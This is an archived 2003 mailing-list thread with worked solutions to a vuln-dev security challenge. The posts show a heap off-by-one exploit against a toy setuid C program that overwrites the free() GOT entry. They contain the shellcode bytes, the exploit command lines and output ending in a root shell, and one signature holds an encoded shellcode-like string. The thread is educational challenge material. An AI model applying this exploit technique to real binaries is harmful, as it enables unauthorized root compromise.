RE: vulndev1.c solution (warning SPOILER)

From: Cameron Brown (cameronat_private)
Date: Wed May 14 2003 - 02:43:29 PDT

  • Next message: Joel Eriksson: "Re: vulndev-1 exploit." 

    This *almost* worked for me, but not quite.  After figuring out the
correct addresses to substitute, I was still getting segfaults.  After
some playing I tried the following, which worked for me:

./vuln1 `printf "\xeb\x0c"``perl -e 'print "A"x204;'``cat shell``printf
"\x0b"` `printf "\x40\x96\x04\x08\x39\xf8\xff\xbf"`

Adding the "\xeb\x0c" jumps over the damage done by free() at p1+8.  I'm
not sure I understand yet how it could have worked for you without the
jump.  My free() damage was a call into bad memory, maybe yours was
somehow something less disruptive?

Thanks very much Jose for posting this spoiler, and thanks Dave McKinney
and Aaron Adams  for posing this challenge to the list.  As a newcomer I
have learned more in one day today about exploits than I have in the
past 2 months of watching this list.

Cameron

-----Original Message-----
From: Jose Ronnick [mailto:matrixat_private] 
Sent: Tuesday, May 13, 2003 6:23 PM
To: vuln-devat_private
Subject: Re: vulndev1.c solution (warning SPOILER)


Man.. someone's gotta show you guys how it's done...  If you want to
solve it yourself, don't read any further..




matrix@overdose vuln-dev $ cat vulndev1.c
// vulndev-1.c
// vuln-dev mailing list security challenge #1
// by Aaron Adams <aadamsat_private>
// Spot the error in this program.

#include <stdio.h>
#include <stdlib.h>

#define SIZE    252

int
main(int argc, char *argv[])
{
                                int i;
        char    *p1, *p2;
        char    *buf1 = malloc(SIZE);
        char    *buf2 = malloc(SIZE);

        if (argc != 3)
                exit(1);

        p1 = argv[1], p2 = argv[2];
printf("p1 is at %p\n", p1);  // DEBUG                          
        strncpy(buf2, p2, SIZE);
        for (i = 0; i <= SIZE && p1[i] != '\0'; i++)
                buf1[i] = p1[i];
        free(buf1);
        free(buf2);
        return 0;
}
matrix@overdose vuln-dev $ gcc -o vuln1 vulndev1.c 
matrix@overdose vuln-dev $ sudo chown root.root ./vuln1 matrix@overdose
vuln-dev $ sudo chmod u+s ./vuln1 matrix@overdose vuln-dev $ objdump -R
./vuln1

./vuln1:     file format elf32-i386

DYNAMIC RELOCATION RECORDS
OFFSET   TYPE              VALUE 
08049654 R_386_GLOB_DAT    __gmon_start__
0804963c R_386_JUMP_SLOT   malloc
08049640 R_386_JUMP_SLOT   __libc_start_main
08049644 R_386_JUMP_SLOT   printf
08049648 R_386_JUMP_SLOT   exit
0804964c R_386_JUMP_SLOT   free
08049650 R_386_JUMP_SLOT   strncpy


matrix@overdose vuln-dev $ pcalc 0x4c-12
        64              0x40            0y1000000
matrix@overdose vuln-dev $ od -ch shell
0000000   1 300 260   F   1 333   1 311 315 200 353 026   [   1 300 210
        c031 46b0 db31 c931 80cd 16eb 315b 88c0
0000020   C  \a 211   [  \b 211   C  \f 260  \v 215   K  \b 215   S  \f
        0743 5b89 8908 0c43 0bb0 4b8d 8d08 0c53
0000040 315 200 350 345 377 377 377   /   b   i   n   /   s   h
        80cd e5e8 ffff 2fff 6962 2f6e 6873
0000056
matrix@overdose vuln-dev $ wc -c shell
     46 shell
matrix@overdose vuln-dev $ pcalc 252-46
        206             0xce            0y11001110
matrix@overdose vuln-dev $ ./vuln1 `perl -e 'print "A"x206;'``cat
shell``printf "\x0b"` `printf "\x40\x96\x04\x08ABCD"` p1 is at
0xbffff839 Segmentation fault matrix@overdose vuln-dev $ ./vuln1 `perl
-e 'print "A"x206;'``cat shell``printf "\x0b"` `printf
"\x40\x96\x04\x08\x39\xf8\xff\xbf"`
p1 is at 0xbffff839
sh-2.05b# id
uid=0(root) gid=100(users) groups=100(users),10(wheel),18(audio)
sh-2.05b# 


questions?  comments?  >=)

-- 
%JOSE_RONNICK%50,:PTX-!399-Purr-!TTTP[XS\-.aa$-do+sP-x121-{Smm-|zq`P-wXq
v-kxwx-5yyzP-11B5-0av(-4Gz!P-~]cz-HcayP-YLg/-wyx0-zyx!P-<C19-~mvIP-PqcJ-
yaa7P-c0oe-rAypP-I$*F-q)cjP-*22a-WPjDP-5134-tPUn-w4wxP-118B-WV4w-xx4vPPP
PPPPPPPPPPPPPPPPPPP

    This archive was generated by hypermail 2b30 : Wed May 14 2003 - 08:34:28 PDT